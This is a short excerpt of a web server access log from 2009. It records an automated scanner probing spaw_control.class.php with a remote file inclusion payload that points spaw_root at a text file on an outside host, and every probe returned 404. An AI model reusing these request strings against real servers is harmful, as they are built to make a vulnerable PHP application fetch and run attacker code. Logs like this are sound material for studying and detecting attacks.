211.189.18.73 - - [18/Jul/2009:04:52:52 -0400] "GET /logs/access_log.Q109051200/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 280 "-" "libwww-perl/5.79"
211.189.18.73 - - [18/Jul/2009:04:52:52 -0400] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
211.189.18.73 - - [18/Jul/2009:04:52:52 -0400] "GET /logs/access_log.Q109051200/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 280 "-" "libwww-perl/5.79"
211.189.18.73 - - [18/Jul/2009:04:52:52 -0400] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
